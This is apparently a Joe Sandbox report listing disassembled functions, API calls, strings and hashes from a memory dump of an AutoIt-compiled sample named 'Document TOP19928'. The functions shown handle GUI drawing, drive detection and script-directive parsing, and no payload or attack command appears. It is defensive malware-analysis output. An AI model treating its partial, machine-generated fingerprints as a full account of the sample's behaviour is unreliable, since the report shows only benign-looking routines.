Snapshot File: hcaresult_0_2_7d0000_Document TOP19928.jbxd

Similarity

API ID: Window$Create$MessageSend$ObjectRect$Stock$AdjustCapsClientDeleteDestroyDeviceFaceFontInfoParametersSelectShowSystemText
String ID: AutoIt v3$DISPLAY$msctls_progress32$static
API String ID: 2910397461-517079104
Opcode ID: 6d6deb42f4f58d38c91ccc76cc186aaaa17cff5f810a59b57cefe1a14b229881
Instruction ID: f6716578a6975c1f63bfd09290ff8b4adc0abd046cdf06ce50aef65d60c05fba
Opcode Fuzzy Hash: 6d6deb42f4f58d38c91ccc76cc186aaaa17cff5f810a59b57cefe1a14b229881
Instruction Fuzzy Hash: C4A18CB1A40209BFEB14ABA4DD4AFAE7BB9FB48711F044115FA14E72E1D774AD00CB64

Function 0083AF7B Relevance: 45.7, APIs: 3, Strings: 23, Instructions: 186COMMON

Download Yara Rule

APIs

SetErrorMode.KERNEL32(00000001), ref: 0083AF89
GetDriveTypeW.KERNEL32(?,0085FAC0,?,\\.\,0085F910), ref: 0083B066
SetErrorMode.KERNEL32(00000000,0085FAC0,?,\\.\,0085F910), ref: 0083B1C4

Strings

FileBackedVirtual, xrefs: 0083B193
CDROM, xrefs: 0083B09A
Fibre, xrefs: 0083B154
ATA, xrefs: 0083B13F
1394, xrefs: 0083B146
\\.\, xrefs: 0083AFDB
MMC, xrefs: 0083B185
PhysicalDrive, xrefs: 0083B012
SATA, xrefs: 0083B177
Virtual, xrefs: 0083B18C
SSD, xrefs: 0083B0F1
SSA, xrefs: 0083B14D
RAID, xrefs: 0083B162
Fixed, xrefs: 0083B0AE
USB, xrefs: 0083B15B
SAS, xrefs: 0083B170
Network, xrefs: 0083B0A4
RAMDisk, xrefs: 0083B090
iSCSI, xrefs: 0083B169
Unknown, xrefs: 0083B086, 0083B12A
ATAPI, xrefs: 0083B138
Removable, xrefs: 0083B0B8
SCSI, xrefs: 0083B131

Memory Dump Source

Source File: 00000000.00000002.2013315930.00000000007D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000000.00000002.2013299379.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.0000000000885000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.000000000088F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.000000000089E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.0000000000903000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013464644.0000000000909000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013480252.000000000090A000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7d0000_Document TOP19928.jbxd

Similarity

API ID: ErrorMode$DriveType
String ID: 1394$ATA$ATAPI$CDROM$Fibre$FileBackedVirtual$Fixed$MMC$Network$PhysicalDrive$RAID$RAMDisk$Removable$SAS$SATA$SCSI$SSA$SSD$USB$Unknown$Virtual$\\.\$iSCSI
API String ID: 2907320926-4222207086
Opcode ID: 8c692232bf3395939d9068e6d7cac89aff07266d2c2c76dba1368e2409cf473f
Instruction ID: 40f79c13976a4d49fbc8449a18d589bd26a2a58817e23978c9f2e3b741d32374
Opcode Fuzzy Hash: 8c692232bf3395939d9068e6d7cac89aff07266d2c2c76dba1368e2409cf473f
Instruction Fuzzy Hash: 66519EB0680609ABDB08FB10C9A297D73B0FB94745F204016E65AE7391D7ADAD41EBC2

Function 007D6A3C Relevance: 44.0, APIs: 12, Strings: 13, Instructions: 275COMMON

Download Yara Rule

APIs

__wcsnicmp.LIBCMT ref: 007D6A91
__wcsnicmp.LIBCMT ref: 007D6AA9
__wcsnicmp.LIBCMT ref: 007D6AC1
__wcsnicmp.LIBCMT ref: 007D6AD9
__wcsnicmp.LIBCMT ref: 007D6AF1
__wcsnicmp.LIBCMT ref: 007D6B09
__wcsnicmp.LIBCMT ref: 007D6B21
__wcsnicmp.LIBCMT ref: 007D6B35
__wcsnicmp.LIBCMT ref: 007D6B76
__wcsnicmp.LIBCMT ref: 007D6B8A
__wcsnicmp.LIBCMT ref: 007D6B9E
__wcsnicmp.LIBCMT ref: 007D6BB2

Strings

Bad directive syntax error, xrefs: 0080E743
Unterminated group of comments, xrefs: 0080E82C
#requireadmin, xrefs: 007D6ABB
#ce, xrefs: 007D6BAC
#OnAutoItStartRegister, xrefs: 007D6AD3
#notrayicon, xrefs: 007D6AA3
Cannot parse #include, xrefs: 0080E819
#cs, xrefs: 007D6B2F, 007D6B84
#include, xrefs: 007D6B03
#pragma compile, xrefs: 007D6A8B
#comments-end, xrefs: 007D6B98
#include-once, xrefs: 007D6AEB
#comments-start, xrefs: 007D6B1B, 007D6B70

Memory Dump Source

Source File: 00000000.00000002.2013315930.00000000007D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000000.00000002.2013299379.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.0000000000885000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.000000000088F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.000000000089E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.0000000000903000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013464644.0000000000909000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013480252.000000000090A000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7d0000_Document TOP19928.jbxd

Similarity

API ID: __wcsnicmp
String ID: #OnAutoItStartRegister$#ce$#comments-end$#comments-start$#cs$#include$#include-once$#notrayicon$#pragma compile$#requireadmin$Bad directive syntax error$Cannot parse #include$Unterminated group of comments
API String ID: 1038674560-86951937
Opcode ID: 7f35ed6ff0d3d44e4096f9780eb256766a184f36ec31bb11d7c5c130fd1b6ad0
Instruction ID: f90b88827d15b31f8f67a0bfbb1db448bb7f6b79ec2a40cc5e41317bb75837b4
Opcode Fuzzy Hash: 7f35ed6ff0d3d44e4096f9780eb256766a184f36ec31bb11d7c5c130fd1b6ad0
Instruction Fuzzy Hash: A281E9B0640615EACB24AB60CC86FBB7778FF14700F148026FE46EA3C2EB68DA45C651

Function 007D2C18 Relevance: 42.5, APIs: 23, Strings: 1, Instructions: 486windowCOMMON

Download Yara Rule

APIs

DestroyWindow.USER32(?,?,?), ref: 007D2CA2
DeleteObject.GDI32(00000000), ref: 007D2CE8
DeleteObject.GDI32(00000000), ref: 007D2CF3
DestroyCursor.USER32(00000000), ref: 007D2CFE
DestroyWindow.USER32(00000000,?,?,?), ref: 007D2D09
SendMessageW.USER32(?,00001308,?,00000000), ref: 0080C68B
6F560200.COMCTL32(?,000000FF,?), ref: 0080C6C4
MoveWindow.USER32(?,?,?,?,?,00000000), ref: 0080CAED

Part of subcall function 007D1B41: InvalidateRect.USER32(?,00000000,00000001,?,?,?,007D2036,?,00000000,?,?,?,?,007D16CB,00000000,?), ref: 007D1B9A

SendMessageW.USER32(?,00001053), ref: 0080CB2A
SendMessageW.USER32(?,00001008,000000FF,00000000), ref: 0080CB41

Strings

0, xrefs: 0080C981

Memory Dump Source

Source File: 00000000.00000002.2013315930.00000000007D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000000.00000002.2013299379.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.0000000000885000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.000000000088F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.000000000089E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.0000000000903000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013464644.0000000000909000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013480252.000000000090A000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7d0000_Document TOP19928.jbxd

Similarity

API ID: DestroyMessageSendWindow$DeleteObject$CursorF560200InvalidateMoveRect
String ID: 0
API String ID: 3972741187-4108050209
Opcode ID: 78aaf3cb854aef652207e849e51e84ff78f85f7432b6199d10c8f030540a5090
Instruction ID: 9521acc65012fa3b2ed1957f3aad5a38d1c220be8fca26706478c1e4121b35f1
Opcode Fuzzy Hash: 78aaf3cb854aef652207e849e51e84ff78f85f7432b6199d10c8f030540a5090
Instruction Fuzzy Hash: CE12AF30600201EFDB60CF24C988BA9BBF5FF55311F54466AE999DB2A2C735EC42DB61

Function 0085AB60 Relevance: 39.2, APIs: 26, Instructions: 201windowCOMMON

Download Yara Rule

APIs

GetSysColor.USER32(00000012), ref: 0085AB99
SetTextColor.GDI32(?,?), ref: 0085AB9D
GetSysColorBrush.USER32(0000000F), ref: 0085ABB3
GetSysColor.USER32(0000000F), ref: 0085ABBE
CreateSolidBrush.GDI32(?), ref: 0085ABC3
GetSysColor.USER32(00000011), ref: 0085ABDB
CreatePen.GDI32(00000000,00000001,00743C00), ref: 0085ABE9
SelectObject.GDI32(?,00000000), ref: 0085ABFA
SetBkColor.GDI32(?,00000000), ref: 0085AC03
SelectObject.GDI32(?,?), ref: 0085AC10
InflateRect.USER32(?,000000FF,000000FF), ref: 0085AC2F
RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 0085AC46
GetWindowLongW.USER32(00000000,000000F0), ref: 0085AC5B
SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 0085ACA7
GetWindowTextW.USER32(00000000,00000000,00000001), ref: 0085ACCE
InflateRect.USER32(?,000000FD,000000FD), ref: 0085ACEC
DrawFocusRect.USER32(?,?), ref: 0085ACF7
GetSysColor.USER32(00000011), ref: 0085AD05
SetTextColor.GDI32(?,00000000), ref: 0085AD0D
DrawTextW.USER32(?,00000000,000000FF,?,?), ref: 0085AD21
SelectObject.GDI32(?,0085A869), ref: 0085AD38
DeleteObject.GDI32(?), ref: 0085AD43
SelectObject.GDI32(?,?), ref: 0085AD49
DeleteObject.GDI32(?), ref: 0085AD4E
SetTextColor.GDI32(?,?), ref: 0085AD54
SetBkColor.GDI32(?,?), ref: 0085AD5E

Memory Dump Source

Source File: 00000000.00000002.2013315930.00000000007D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000000.00000002.2013299379.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.0000000000885000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.000000000088F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.000000000089E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.0000000000903000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013464644.0000000000909000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013480252.000000000090A000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7d0000_Document TOP19928.jbxd

Similarity

API ID: Color$Object$Text$RectSelect$BrushCreateDeleteDrawInflateWindow$FocusLongMessageRoundSendSolid
String ID:
API String ID: 1996641542-0
Opcode ID: 2e89c815d352713e7137e0ced597186880a1c0b545c79cffcfbb35ac525aec2a
Instruction ID: c83b302e90298b17f1be68c5609946503f929c66e742a1451d61fdd8b56d1ed9
Opcode Fuzzy Hash: 2e89c815d352713e7137e0ced597186880a1c0b545c79cffcfbb35ac525aec2a
Instruction Fuzzy Hash: 8A614E71900218EFDF159FA4DC48EAE7BB9FB08322F144225FA15AB2A2D7759D40DF90

Function 00858C44 Relevance: 38.9, APIs: 21, Strings: 1, Instructions: 401windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,00000158,000000FF,0000014E), ref: 00858D34
SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00858D45
CharNextW.USER32(0000014E), ref: 00858D74
SendMessageW.USER32(?,0000014B,00000000,00000000), ref: 00858DB5
SendMessageW.USER32(?,00000158,000000FF,00000158), ref: 00858DCB
SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00858DDC
SendMessageW.USER32(?,000000C2,00000001,0000014E), ref: 00858DF9
SetWindowTextW.USER32(?,0000014E), ref: 00858E45
SendMessageW.USER32(?,000000B1,000F4240,000F423F), ref: 00858E5B
SendMessageW.USER32(?,00001002,00000000,?), ref: 00858E8C
_memset.LIBCMT ref: 00858EB1
SendMessageW.USER32(00000000,00001060,00000001,00000004), ref: 00858EFA
_memset.LIBCMT ref: 00858F59
SendMessageW.USER32(?,00001053,000000FF,?), ref: 00858F83
SendMessageW.USER32(?,00001074,?,00000001), ref: 00858FDB
SendMessageW.USER32(?,0000133D,?,?), ref: 00859088
InvalidateRect.USER32(?,00000000,00000001), ref: 008590AA
GetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 008590F4
SetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 00859121
DrawMenuBar.USER32(?), ref: 00859130
SetWindowTextW.USER32(?,0000014E), ref: 00859158

Strings

0, xrefs: 008590C2

Memory Dump Source

Source File: 00000000.00000002.2013315930.00000000007D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000000.00000002.2013299379.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.0000000000885000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.000000000088F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.000000000089E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.0000000000903000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013464644.0000000000909000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013480252.000000000090A000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7d0000_Document TOP19928.jbxd

Similarity

API ID: MessageSend$Menu$InfoItemTextWindow_memset$CharDrawInvalidateNextRect
String ID: 0
API String ID: 1073566785-4108050209
Opcode ID: 78211d28c724034f54bcd0eacb3b4f0d6c3d8ecbc9dc046d135a6180a64f09b3
Instruction ID: 38e2586eeec0753e125ea23366f8b696de2838bff737e49195818d3f18000d8f
Opcode Fuzzy Hash: 78211d28c724034f54bcd0eacb3b4f0d6c3d8ecbc9dc046d135a6180a64f09b3
Instruction Fuzzy Hash: 5BE16F70900219EBDF209F54CC88AEE7BB9FF05715F10815AFE15EA291DB748A89DF60

Function 00854B16 Relevance: 37.0, APIs: 18, Strings: 3, Instructions: 290windowCOMMON

Download Yara Rule

APIs

GetCursorPos.USER32(?), ref: 00854C51
GetDesktopWindow.USER32 ref: 00854C66
GetWindowRect.USER32(00000000), ref: 00854C6D
GetWindowLongW.USER32(?,000000F0), ref: 00854CCF
DestroyWindow.USER32(?), ref: 00854CFB
CreateWindowExW.USER32(00000008,tooltips_class32,00000000,00000003,80000000,80000000,80000000,80000000,00000000,00000000,00000000,00000000), ref: 00854D24
SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00854D42
SendMessageW.USER32(?,00000439,00000000,00000030), ref: 00854D68
SendMessageW.USER32(?,00000421,?,?), ref: 00854D7D
SendMessageW.USER32(?,0000041D,00000000,00000000), ref: 00854D90
IsWindowVisible.USER32(?), ref: 00854DB0
SendMessageW.USER32(?,00000412,00000000,D8F0D8F0), ref: 00854DCB
SendMessageW.USER32(?,00000411,00000001,00000030), ref: 00854DDF
GetWindowRect.USER32(?,?), ref: 00854DF7
MonitorFromPoint.USER32(?,?,00000002), ref: 00854E1D
GetMonitorInfoW.USER32(00000000,?), ref: 00854E37
CopyRect.USER32(?,?), ref: 00854E4E
SendMessageW.USER32(?,00000412,00000000), ref: 00854EB9

Strings

(, xrefs: 00854E2A
0, xrefs: 00854BFC
tooltips_class32, xrefs: 00854D1D

Memory Dump Source

Source File: 00000000.00000002.2013315930.00000000007D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000000.00000002.2013299379.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.0000000000885000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.000000000088F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.000000000089E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.0000000000903000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013464644.0000000000909000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013480252.000000000090A000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7d0000_Document TOP19928.jbxd

Similarity

API ID: MessageSendWindow$Rect$Monitor$CopyCreateCursorDesktopDestroyFromInfoLongPointVisible
String ID: ($0$tooltips_class32
API String ID: 698492251-4156429822
Opcode ID: 9f0a579ff64f525338123e1d2c1be63a0d9a01780d99a5c810ac5a8295f1769e
Instruction ID: 93fa5be48a14dbaa8933254d36e3dc8df19a6b8df1958e94a0e0c107008b9712
Opcode Fuzzy Hash: 9f0a579ff64f525338123e1d2c1be63a0d9a01780d99a5c810ac5a8295f1769e
Instruction Fuzzy Hash: 9AB18971604340AFDB04DF64C849B6ABBE5FF88319F00891DF9999B2A1D775EC48CB92

Function 007D27D9 Relevance: 33.5, APIs: 18, Strings: 1, Instructions: 286windowtimeCOMMON

Download Yara Rule

APIs

SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 007D28BC
GetSystemMetrics.USER32(00000007), ref: 007D28C4
SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 007D28EF
GetSystemMetrics.USER32(00000008), ref: 007D28F7
GetSystemMetrics.USER32(00000004), ref: 007D291C
SetRect.USER32(000000FF,00000000,00000000,000000FF,000000FF), ref: 007D2939
AdjustWindowRectEx.USER32(000000FF,?,00000000,?), ref: 007D2949
CreateWindowExW.USER32(?,AutoIt v3 GUI,?,?,?,000000FF,000000FF,000000FF,?,00000000,00000000), ref: 007D297C
SetWindowLongW.USER32(00000000,000000EB,00000000), ref: 007D2990
GetClientRect.USER32(00000000,000000FF), ref: 007D29AE
GetStockObject.GDI32(00000011), ref: 007D29CA
SendMessageW.USER32(00000000,00000030,00000000), ref: 007D29D5

Part of subcall function 007D2344: GetCursorPos.USER32(?), ref: 007D2357
Part of subcall function 007D2344: ScreenToClient.USER32(008967B0,?), ref: 007D2374
Part of subcall function 007D2344: GetAsyncKeyState.USER32(00000001), ref: 007D2399
Part of subcall function 007D2344: GetAsyncKeyState.USER32(00000002), ref: 007D23A7

SetTimer.USER32(00000000,00000000,00000028,007D1256), ref: 007D29FC

Strings

AutoIt v3 GUI, xrefs: 007D2974

Memory Dump Source

Source File: 00000000.00000002.2013315930.00000000007D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000000.00000002.2013299379.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.0000000000885000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.000000000088F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.000000000089E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.0000000000903000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013464644.0000000000909000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013480252.000000000090A000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7d0000_Document TOP19928.jbxd

Similarity

API ID: System$MetricsRectWindow$AsyncClientInfoParametersState$AdjustCreateCursorLongMessageObjectScreenSendStockTimer
String ID: AutoIt v3 GUI
API String ID: 1458621304-248962490
Opcode ID: dd0ffad305c7fe37143a3bd6382fd1ce84e28d6c96d891d4216887b68b39d6eb
Instruction ID: 10146408830e401e48ffbea556cb4452dd0f03854df31b7aa609b9b2c7619762
Opcode Fuzzy Hash: dd0ffad305c7fe37143a3bd6382fd1ce84e28d6c96d891d4216887b68b39d6eb
Instruction Fuzzy Hash: E8B17F7160020AEFDB14DFA8DC45BAE7BB4FB58315F11822AFA15E7391DB389852CB50

Function 008346D6 Relevance: 33.4, APIs: 14, Strings: 5, Instructions: 179COMMON

Download Yara Rule

APIs

_wcscpy.LIBCMT ref: 0083473C
_wcscmp.LIBCMT ref: 00834747
_wcscat.LIBCMT ref: 0083475D
_wcsstr.LIBCMT ref: 00834768
74D31560.VERSION(?,\VarFileInfo\Translation,?,?,?,?,?,?,00000000,?,?), ref: 00834784
_wcscat.LIBCMT ref: 008347CD
_wcscat.LIBCMT ref: 008347D4
_wcsncpy.LIBCMT ref: 008347FF

Strings

04090000, xrefs: 008347BA
\VarFileInfo\Translation, xrefs: 0083477C
DefaultLangCodepage, xrefs: 008347E7
%u.%u.%u.%u, xrefs: 00834862
StringFileInfo\, xrefs: 00834757

Memory Dump Source

Source File: 00000000.00000002.2013315930.00000000007D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000000.00000002.2013299379.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.0000000000885000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.000000000088F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.000000000089E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.0000000000903000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013464644.0000000000909000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013480252.000000000090A000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7d0000_Document TOP19928.jbxd

Similarity

API ID: _wcscat$D31560_wcscmp_wcscpy_wcsncpy_wcsstr
String ID: %u.%u.%u.%u$04090000$DefaultLangCodepage$StringFileInfo\$\VarFileInfo\Translation
API String ID: 390803403-1459072770
Opcode ID: 0928eb0528c202d433d51ac6e93371562863249df27d808af95e7c3cacfef15e
Instruction ID: 779e112fd2eaae374e2608f1644cdffe7f064d8a64758b0da53a80715eb959e0
Opcode Fuzzy Hash: 0928eb0528c202d433d51ac6e93371562863249df27d808af95e7c3cacfef15e
Instruction Fuzzy Hash: CB41F971600218FAE711B7648C4BEBF77ACFF45710F140166FA04E6283EB7DAA0157A5

Function 00854069 Relevance: 28.3, APIs: 3, Strings: 13, Instructions: 283windowCOMMON

Download Yara Rule

APIs

CharUpperBuffW.USER32(?,?), ref: 008540F6
SendMessageW.USER32(?,00001032,00000000,00000000), ref: 008541B6

Strings

SELECTALL, xrefs: 0085421D
GETSELECTED, xrefs: 008542E4
VIEWCHANGE, xrefs: 00854375
GETITEMCOUNT, xrefs: 00854128
ISSELECTED, xrefs: 008541C1
SELECTINVERT, xrefs: 00854286
DESELECT, xrefs: 008542A4
FINDITEM, xrefs: 00854329
GETTEXT, xrefs: 0085415F
SELECT, xrefs: 00854250
SELECTCLEAR, xrefs: 00854235
GETSUBITEMCOUNT, xrefs: 00854141
GETSELECTEDCOUNT, xrefs: 00854199

Memory Dump Source

Source File: 00000000.00000002.2013315930.00000000007D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000000.00000002.2013299379.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.0000000000885000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.000000000088F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.000000000089E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.0000000000903000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013464644.0000000000909000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013480252.000000000090A000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7d0000_Document TOP19928.jbxd

Similarity

API ID: BuffCharMessageSendUpper
String ID: DESELECT$FINDITEM$GETITEMCOUNT$GETSELECTED$GETSELECTEDCOUNT$GETSUBITEMCOUNT$GETTEXT$ISSELECTED$SELECT$SELECTALL$SELECTCLEAR$SELECTINVERT$VIEWCHANGE
API String ID: 3974292440-719923060
Opcode ID: 6619c35e2ec8e7cfe619fe36dbf89b8374c7bae9c3d4a04810ebbe99556320a6
Instruction ID: e10aee52443497fe8ea68f4abb681cbc7919889287054d7fefabba612bee0db3
Opcode Fuzzy Hash: 6619c35e2ec8e7cfe619fe36dbf89b8374c7bae9c3d4a04810ebbe99556320a6
Instruction Fuzzy Hash: ECA1BE30214315DBCB14EF20C855A6AB7A5FF84319F109869B99ADB3A2EB34EC49CB51

Function 008452F0 Relevance: 27.1, APIs: 18, Instructions: 124COMMON

Download Yara Rule

APIs

LoadCursorW.USER32(00000000,00007F89), ref: 00845309
LoadCursorW.USER32(00000000,00007F8A), ref: 00845314
LoadCursorW.USER32(00000000,00007F00), ref: 0084531F
LoadCursorW.USER32(00000000,00007F03), ref: 0084532A
LoadCursorW.USER32(00000000,00007F8B), ref: 00845335
LoadCursorW.USER32(00000000,00007F01), ref: 00845340
LoadCursorW.USER32(00000000,00007F81), ref: 0084534B
LoadCursorW.USER32(00000000,00007F88), ref: 00845356
LoadCursorW.USER32(00000000,00007F80), ref: 00845361
LoadCursorW.USER32(00000000,00007F86), ref: 0084536C
LoadCursorW.USER32(00000000,00007F83), ref: 00845377
LoadCursorW.USER32(00000000,00007F85), ref: 00845382
LoadCursorW.USER32(00000000,00007F82), ref: 0084538D
LoadCursorW.USER32(00000000,00007F84), ref: 00845398
LoadCursorW.USER32(00000000,00007F04), ref: 008453A3
LoadCursorW.USER32(00000000,00007F02), ref: 008453AE
GetCursorInfo.USER32(?), ref: 008453BE
GetLastError.KERNEL32(00000001,00000000), ref: 008453E9

Memory Dump Source

Source File: 00000000.00000002.2013315930.00000000007D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000000.00000002.2013299379.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.0000000000885000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.000000000088F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.000000000089E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.0000000000903000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013464644.0000000000909000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013480252.000000000090A000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7d0000_Document TOP19928.jbxd

Similarity

API ID: Cursor$Load$ErrorInfoLast
String ID:
API String ID: 3215588206-0
Opcode ID: bbb2e94e34ec3a497228825c463f9f963fded0256d56d9db3ef66647ebcc9e01
Instruction ID: 8806bee9dda13626728896af35531e6234df47d77e8441ff0fd40c223a5cd406
Opcode Fuzzy Hash: bbb2e94e34ec3a497228825c463f9f963fded0256d56d9db3ef66647ebcc9e01
Instruction Fuzzy Hash: 49415270E04319ABDB109FBA8C4996EFEB8FF51B50B10452BE509E7291DAB89401CE65

Function 0082AA64 Relevance: 26.5, APIs: 14, Strings: 1, Instructions: 273windowtimeCOMMON

Download Yara Rule

APIs

GetClassNameW.USER32(?,?,00000100), ref: 0082AAA5
__swprintf.LIBCMT ref: 0082AB46
_wcscmp.LIBCMT ref: 0082AB59
SendMessageTimeoutW.USER32(?,?,00000101,00000000,00000002,00001388,?), ref: 0082ABAE
_wcscmp.LIBCMT ref: 0082ABEA
GetClassNameW.USER32(?,?,00000400), ref: 0082AC21
GetDlgCtrlID.USER32(?), ref: 0082AC73
GetWindowRect.USER32(?,?), ref: 0082ACA9
GetParent.USER32(?), ref: 0082ACC7
ScreenToClient.USER32(00000000), ref: 0082ACCE
GetClassNameW.USER32(?,?,00000100), ref: 0082AD48
_wcscmp.LIBCMT ref: 0082AD5C
GetWindowTextW.USER32(?,?,00000400), ref: 0082AD82
_wcscmp.LIBCMT ref: 0082AD96

Part of subcall function 007F386C: _iswctype.LIBCMT ref: 007F3874

Strings

%s%u, xrefs: 0082AB40

Memory Dump Source

Source File: 00000000.00000002.2013315930.00000000007D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000000.00000002.2013299379.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
